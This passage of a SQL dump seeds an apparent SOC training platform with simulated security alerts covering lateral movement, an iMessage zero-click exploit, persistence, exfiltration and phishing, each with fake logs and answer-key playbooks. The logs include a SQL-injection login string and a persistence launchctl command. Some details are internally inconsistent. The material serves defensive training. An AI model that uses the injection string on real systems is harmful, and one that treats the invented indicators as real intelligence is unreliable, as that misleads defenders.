Safari/537.36\\\",\\\"filename\\\":\\\"suspicious.php\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"webadmin\\\",\\\"status_code\\\":200,\\\"response_size\\\":345}\"},{\"timestamp\":\"2026-02-01T20:30:22.759Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:34Z\\\",\\\"web_server\\\":\\\"Apache/2.4.41 (Ubuntu)\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"http_request\\\":\\\"POST /uploads/suspicious.php HTTP/1.1\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\\\",\\\"filename\\\":\\\"suspicious.php\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"webadmin\\\",\\\"status_code\\\":200,\\\"response_size\\\":345}\"},{\"timestamp\":\"2026-02-01T20:29:22.759Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:34Z\\\",\\\"web_server\\\":\\\"Apache/2.4.41 (Ubuntu)\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"http_request\\\":\\\"POST /uploads/suspicious.php HTTP/1.1\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 
Safari/537.36\\\",\\\"filename\\\":\\\"suspicious.php\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"webadmin\\\",\\\"status_code\\\":200,\\\"response_size\\\":345}\"},{\"timestamp\":\"2026-02-01T20:28:22.759Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:34Z\\\",\\\"web_server\\\":\\\"Apache/2.4.41 (Ubuntu)\\\",\\\"client_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"http_request\\\":\\\"POST /uploads/suspicious.php HTTP/1.1\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\\\",\\\"filename\\\":\\\"suspicious.php\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"webadmin\\\",\\\"status_code\\\":200,\\\"response_size\\\":345}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1061, 'Lateral Movement Initiated', 'high', 'Internal network monitoring', 'With persistence established, the attacker is now exploring the internal network, attempting to access critical systems and harvest sensitive data. The attacker used compromised credentials to access a sensitive server and attempted to move laterally to other systems.', 'Lateral Movement', 'T1021', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T14:32:22Z\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"192.168.1.100\",\"external_attacker_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"action\":\"network_access\",\"destination_port\":445,\"protocol\":\"SMB\",\"file_accessed\":\"financial_data.xlsx\",\"hash\":\"8d91f5f3cd7c2b9a9a3f4e2f1c3d5e4b\",\"status\":\"success\"}', '2026-01-24 03:32:45', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"internal\",\"details\":\"Destination sensitive server targeted in lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP associated with previous campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"internal\",\"details\":\"Compromised internal account used for lateral movement.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"8d91f5f3cd7c2b9a9a3f4e2f1c3d5e4b\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"suspicious\",\"details\":\"File hash associated with lateral 
movement tools.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1062, 'Alert: Suspicious iMessage Activity Detected', 'high', 'iOS Device Logs', 'A crafted iMessage was detected, exploiting a known vulnerability to gain initial access to the target device without user interaction. The message originated from an external IP known for malicious activities.', 'Initial Access', 'T1203 - Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:52Z\",\"device_id\":\"ios_device_123456\",\"user\":\"user@example.com\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.25\",\"message_id\":\"msg-20231015-01\",\"exploit_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"attachment.jpg\",\"status\":\"Delivered\",\"exploit_detected\":true}', '2026-01-24 03:33:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple zero-click exploits.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the targeted device.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Tool\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known iMessage exploit payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.761Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"device_id\\\":\\\"ios_device_123456\\\",\\\"user\\\":\\\"user@example.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"message_id\\\":\\\"msg-20231015-01\\\",\\\"exploit_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"attachment.jpg\\\",\\\"status\\\":\\\"Delivered\\\",\\\"exploit_detected\\\":true}\"},{\"timestamp\":\"2026-02-01T20:31:22.761Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"device_id\\\":\\\"ios_device_123456\\\",\\\"user\\\":\\\"user@example.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"message_id\\\":\\\"msg-20231015-01\\\",\\\"exploit_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"attachment.jpg\\\",\\\"status\\\":\\\"Delivered\\\",\\\"exploit_detected\\\":true}\"},{\"timestamp\":\"2026-02-01T20:30:22.761Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"device_id\\\":\\\"ios_device_123456\\\",\\\"user\\\":\\\"user@example.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"message_id\\\":\\\"msg-20231015-01\\\",\\\"exploit_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"attachment.jpg\\\",\\\"status\\\":\\\"Delivered\\\",\\\"exploit_detected\\\":true}\"},{\"timestamp\":\"2026-02-01T20:29:22.761Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"device_id\\\":\\\"ios_device_123456\\\",\\\"user\\\":\\\"user@example.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"message_id\\\":\\\"msg-20231015-01\\\",\\\"exploit_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"attachment.jpg\\\",\\\"status\\\":\\\"Delivered\\\",\\\"exploit_detected\\\":true}\"},{\"timestamp\":\"2026-02-01T20:28:22.761Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:52Z\\\",\\\"device_id\\\":\\\"ios_device_123456\\\",\\\"user\\\":\\\"user@example.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"message_id\\\":\\\"msg-20231015-01\\\",\\\"exploit_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"attachment.jpg\\\",\\\"status\\\":\\\"Delivered\\\",\\\"exploit_detected\\\":true}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1063, 'Alert: FORCEDENTRY Vulnerability Exploited', 'critical', 'Security Incident and Event Management (SIEM) System', 'A zero-click exploit successfully triggered the FORCEDENTRY vulnerability, allowing the attacker to execute arbitrary code on the target\'s device. This indicates a severe breach that requires immediate attention.', 'Execution', 'T1203 - Exploitation for Client Execution', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:23:55Z\",\"event_id\":\"987654321\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"malicious_filename\":\"forgedentry_payload.bin\",\"malicious_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"action\":\"execute\",\"vulnerability_triggered\":\"FORCEDENTRY\",\"device\":\"iPhone13,4\",\"os_version\":\"iOS 14.8\"}', '2026-01-24 03:33:29', '2026-02-16 17:48:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with multiple APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal device IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"forgedentry_payload.bin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Payload used in exploitation of FORCEDENTRY vulnerability.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.763Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:55Z\\\",\\\"event_id\\\":\\\"987654321\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"malicious_filename\\\":\\\"forgedentry_payload.bin\\\",\\\"malicious_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"execute\\\",\\\"vulnerability_triggered\\\":\\\"FORCEDENTRY\\\",\\\"device\\\":\\\"iPhone13,4\\\",\\\"os_version\\\":\\\"iOS 14.8\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.763Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:55Z\\\",\\\"event_id\\\":\\\"987654321\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"malicious_filename\\\":\\\"forgedentry_payload.bin\\\",\\\"malicious_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"execute\\\",\\\"vulnerability_triggered\\\":\\\"FORCEDENTRY\\\",\\\"device\\\":\\\"iPhone13,4\\\",\\\"os_version\\\":\\\"iOS 14.8\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.763Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:55Z\\\",\\\"event_id\\\":\\\"987654321\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"malicious_filename\\\":\\\"forgedentry_payload.bin\\\",\\\"malicious_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"execute\\\",\\\"vulnerability_triggered\\\":\\\"FORCEDENTRY\\\",\\\"device\\\":\\\"iPhone13,4\\\",\\\"os_version\\\":\\\"iOS 14.8\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.763Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:55Z\\\",\\\"event_id\\\":\\\"987654321\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"malicious_filename\\\":\\\"forgedentry_payload.bin\\\",\\\"malicious_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"execute\\\",\\\"vulnerability_triggered\\\":\\\"FORCEDENTRY\\\",\\\"device\\\":\\\"iPhone13,4\\\",\\\"os_version\\\":\\\"iOS 14.8\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.763Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:55Z\\\",\\\"event_id\\\":\\\"987654321\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"malicious_filename\\\":\\\"forgedentry_payload.bin\\\",\\\"malicious_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"execute\\\",\\\"vulnerability_triggered\\\":\\\"FORCEDENTRY\\\",\\\"device\\\":\\\"iPhone13,4\\\",\\\"os_version\\\":\\\"iOS 14.8\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1064, 'Alert: Persistence Mechanism Identified', 'medium', 'Mobile Device Management (MDM) Logs', 'A post-exploitation script has been executed on the target device to establish a persistent mechanism. This backdoor allows the attacker to maintain access to the device beyond the initial compromise.', 'Persistence', 'T1547 - Boot or Logon Autostart Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:34Z\",\"device_id\":\"device_12345\",\"user\":\"jdoe\",\"source_ip\":\"192.168.1.15\",\"malicious_ip\":\"203.0.113.45\",\"file_created\":\"/Library/LaunchAgents/com.example.malicious.plist\",\"hash\":\"a6b1c1c68cfe5b9d1e0e4d5b6f2c3a8f\",\"action\":\"script_execution\",\"description\":\"A script was executed to create a LaunchAgent for persistence.\",\"command\":\"launchctl load -w /Library/LaunchAgents/com.example.malicious.plist\"}', '2026-01-24 03:33:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malware distribution.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"/Library/LaunchAgents/com.example.malicious.plist\",\"is_critical\":true,\"osint_result\":{\"source\":\"InternalAnalysis\",\"verdict\":\"malicious\",\"details\":\"File used for persistence by malware.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a6b1c1c68cfe5b9d1e0e4d5b6f2c3a8f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware variant.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalUserDB\",\"verdict\":\"internal\",\"details\":\"Legitimate user 
account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.764Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"device_id\\\":\\\"device_12345\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"malicious_ip\\\":\\\"203.0.113.45\\\",\\\"file_created\\\":\\\"/Library/LaunchAgents/com.example.malicious.plist\\\",\\\"hash\\\":\\\"a6b1c1c68cfe5b9d1e0e4d5b6f2c3a8f\\\",\\\"action\\\":\\\"script_execution\\\",\\\"description\\\":\\\"A script was executed to create a LaunchAgent for persistence.\\\",\\\"command\\\":\\\"launchctl load -w /Library/LaunchAgents/com.example.malicious.plist\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.764Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"device_id\\\":\\\"device_12345\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"malicious_ip\\\":\\\"203.0.113.45\\\",\\\"file_created\\\":\\\"/Library/LaunchAgents/com.example.malicious.plist\\\",\\\"hash\\\":\\\"a6b1c1c68cfe5b9d1e0e4d5b6f2c3a8f\\\",\\\"action\\\":\\\"script_execution\\\",\\\"description\\\":\\\"A script was executed to create a LaunchAgent for persistence.\\\",\\\"command\\\":\\\"launchctl load -w /Library/LaunchAgents/com.example.malicious.plist\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.764Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated 
event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"device_id\\\":\\\"device_12345\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"malicious_ip\\\":\\\"203.0.113.45\\\",\\\"file_created\\\":\\\"/Library/LaunchAgents/com.example.malicious.plist\\\",\\\"hash\\\":\\\"a6b1c1c68cfe5b9d1e0e4d5b6f2c3a8f\\\",\\\"action\\\":\\\"script_execution\\\",\\\"description\\\":\\\"A script was executed to create a LaunchAgent for persistence.\\\",\\\"command\\\":\\\"launchctl load -w /Library/LaunchAgents/com.example.malicious.plist\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.764Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"device_id\\\":\\\"device_12345\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"malicious_ip\\\":\\\"203.0.113.45\\\",\\\"file_created\\\":\\\"/Library/LaunchAgents/com.example.malicious.plist\\\",\\\"hash\\\":\\\"a6b1c1c68cfe5b9d1e0e4d5b6f2c3a8f\\\",\\\"action\\\":\\\"script_execution\\\",\\\"description\\\":\\\"A script was executed to create a LaunchAgent for persistence.\\\",\\\"command\\\":\\\"launchctl load -w /Library/LaunchAgents/com.example.malicious.plist\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.764Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"device_id\\\":\\\"device_12345\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"malicious_ip\\\":\\\"203.0.113.45\\\",\\\"file_created\\\":\\\"/Library/LaunchAgents/com.example.malicious.plist\\\",\\\"hash\\\":\\\"a6b1c1c68cfe5b9d1e0e4d5b6f2c3a8f\\\",\\\"action\\\":\\\"script_execution\\\",\\\"description\\\":\\\"A script was executed to create a 
LaunchAgent for persistence.\\\",\\\"command\\\":\\\"launchctl load -w /Library/LaunchAgents/com.example.malicious.plist\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1065, 'Alert: Unusual Data Traffic Detected', 'high', 'Network Traffic Analysis', 'Unusual outbound traffic detected from internal host to known malicious IP. Data exfiltration suspected.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:22:30Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.76\",\"destination_port\":8080,\"protocol\":\"HTTP\",\"filename\":\"sensitive_data.zip\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"username\":\"jdoe\",\"action\":\"exfiltration\",\"bytes_sent\":5242880}', '2026-01-24 03:33:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.76\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT group\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"sensitive_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"file analysis\",\"verdict\":\"suspicious\",\"details\":\"File contains sensitive information\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash database\",\"verdict\":\"suspicious\",\"details\":\"Hash matches known exfiltration tool\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal directory\",\"verdict\":\"internal\",\"details\":\"Username associated with compromised account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1066, 'Suspicious Email Phishing Campaign Detected', 'high', 'Email gateway logs', 'APT1 has initiated a spear-phishing campaign targeting corporate employees. The phishing emails contain a malicious attachment disguised as a legitimate document.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:48:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"source_email\":\"john.doe@maliciousdomain.com\",\"destination_email\":\"employee@company.com\",\"subject\":\"Urgent: Action Required\",\"attachment\":\"Invoice_2023.docx\",\"attachment_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"message_id\":\"<20231005144800.1a2bc34d@example.com>\"}', '2026-01-24 03:35:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing 